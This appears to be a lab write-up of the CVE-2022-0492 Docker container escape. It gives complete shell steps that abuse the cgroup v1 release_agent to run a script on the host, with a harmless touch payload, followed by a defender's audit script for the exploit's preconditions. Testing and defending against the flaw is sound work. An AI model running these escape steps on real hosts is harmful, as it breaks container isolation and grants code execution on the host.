System - Docker - Container Escape - CVE-2022-0492



References:
https://github.com/chenaotian/CVE-2022-0492
https://download.docker.com/linux/ubuntu/dists/focal/pool/stable/amd64/containerd.io_1.2.13-2_amd64.deb
https://download.docker.com/linux/ubuntu/dists/focal/pool/stable/amd64/docker-ce_19.03.10~3-0~ubuntu-focal_amd64.deb
https://download.docker.com/linux/ubuntu/dists/focal/pool/stable/amd64/docker-ce-cli_19.03.10~3-0~ubuntu-focal_amd64.deb

Test environment
Ubuntu 20.04 (5.4.0-21-generic)
Docker version 19.03.10, build 9424aeaee9

Test steps

$ sudo docker run --rm -it --security-opt apparmor=unconfined --security-opt seccomp=unconfined ubuntu:22.04 /bin/bash
cve:/# unshare -UrmC --propagation=unchanged bash
cve:/# mkdir /tmp/test
cve:/# mount -t cgroup -o rdma cgroup /tmp/test
cve:/# mkdir /tmp/test/x
cve:/# echo 1 > /tmp/test/x/notify_on_release
cve:/# echo '#!/bin/sh' > /cmd
cve:/# echo "touch /tmp/cve_test" >> /cmd
cve:/# chmod 0777 /cmd
cve:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
cve:/# echo "$host_path/cmd" > /tmp/test/release_agent
cve:/# sh -c "echo \$\$ > /tmp/test/x/cgroup.procs"
cve:/# exit
cve:/# exit

# ls /tmp
    cve_test

P.S. A command can follow unshare directly, e.g.: unshare -UrmC mount -t cgroup -o release_agent=test cgroup /mnt
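The steps above only work because the container was started with AppArmor and seccomp switched off (Docker's default seccomp profile blocks unshare(CLONE_NEWUSER) and the default AppArmor profile denies mounting cgroupfs), because the host still mounts cgroup v1 hierarchies (release_agent does not exist on cgroup2), and because the kernel predates the fix that requires CAP_SYS_ADMIN in the initial user namespace to write release_agent. The following audit script is an added example written for this page; it is not code from the original write-up or from the chenaotian repository. It reads a `docker inspect` JSON array from a file named on the command line (or a constructed sample mirroring the `docker run` line above) together with the host's /proc/mounts and the Debian/Ubuntu-specific kernel.unprivileged_userns_clone sysctl, and reports which of those preconditions are present. The file name audit.py and the sample values are assumptions.

```python
#!/usr/bin/env python3
"""Audit a Docker host for the preconditions the CVE-2022-0492 escape relies on.

Added defender-side example; not part of the original write-up and not a
Docker tool. Usage:
    docker inspect $(docker ps -q) > inspect.json && python3 audit.py inspect.json
Without an argument a constructed sample is used so the script runs offline.
"""
import json
import sys
from typing import List

# The escape had to switch off both of these with --security-opt: Docker's
# default seccomp profile blocks unshare(CLONE_NEWUSER) and the default
# AppArmor profile denies mounting cgroupfs inside the container.
RISKY_SECURITY_OPTS = {"apparmor=unconfined", "seccomp=unconfined"}


def _normalise(opt: str) -> str:
    """Older Docker releases accepted "key:value"; treat both spellings alike."""
    return opt.strip().lower().replace(":", "=", 1)


def assess_container(entry: dict) -> List[str]:
    """Findings for one element of the `docker inspect` array."""
    findings = []
    name = entry.get("Name", "<unknown>").lstrip("/")
    host = entry.get("HostConfig") or {}
    opts = {_normalise(o) for o in (host.get("SecurityOpt") or [])}
    for opt in sorted(opts & RISKY_SECURITY_OPTS):
        findings.append(f"{name}: SecurityOpt {opt} disables a default mitigation")
    if host.get("Privileged"):
        findings.append(f"{name}: Privileged=true (cgroupfs writable without unshare)")
    caps = {c.upper().replace("CAP_", "", 1) for c in (host.get("CapAdd") or [])}
    if caps & {"SYS_ADMIN", "ALL"}:
        findings.append(f"{name}: CapAdd grants SYS_ADMIN (can mount cgroupfs directly)")
    return findings


def assess_host(mounts_text: str, unprivileged_userns_clone: str = "") -> List[str]:
    """Findings from /proc/mounts text and the sysctl value ("" when the file is absent).

    Only the value "0" counts as restricted: a vanilla kernel has no such sysctl
    and allows unprivileged user namespaces by default.
    """
    findings = []
    fstypes = [line.split()[2] for line in mounts_text.splitlines() if len(line.split()) >= 3]
    v1 = fstypes.count("cgroup")
    if v1:
        findings.append(f"host: {v1} cgroup v1 hierarchies mounted; release_agent exists only on v1")
    if unprivileged_userns_clone.strip() != "0":
        findings.append("host: unprivileged user namespaces not restricted (unshare -Ur works)")
    return findings


# Constructed sample mirroring the `docker run` line in the test steps above.
SAMPLE_INSPECT = [{
    "Name": "/cve",
    "HostConfig": {
        "Privileged": False,
        "CapAdd": None,
        "SecurityOpt": ["apparmor=unconfined", "seccomp=unconfined"],
    },
}]
# Constructed /proc/mounts excerpt: one cgroup v1 hierarchy (the rdma one mounted above).
SAMPLE_MOUNTS = "cgroup /sys/fs/cgroup/rdma cgroup rw,nosuid,nodev,noexec,relatime,rdma 0 0\n"


def _read(path: str, fallback: str) -> str:
    """Read a /proc file, falling back to the constructed sample when unavailable."""
    try:
        with open(path) as fh:
            return fh.read()
    except OSError:
        return fallback


def main(argv: List[str]) -> int:
    if len(argv) > 1:
        with open(argv[1]) as fh:
            entries = json.load(fh)
    else:
        entries = SAMPLE_INSPECT
    findings = []
    for entry in entries:
        findings += assess_container(entry)
    findings += assess_host(_read("/proc/mounts", SAMPLE_MOUNTS),
                            _read("/proc/sys/kernel/unprivileged_userns_clone", ""))
    for finding in findings:
        print(finding)
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

A non-zero exit status means at least one precondition is present; the lasting fix is a kernel that carries the release_agent capability check, with cgroup2 and the default seccomp/AppArmor profiles left in place as additional barriers.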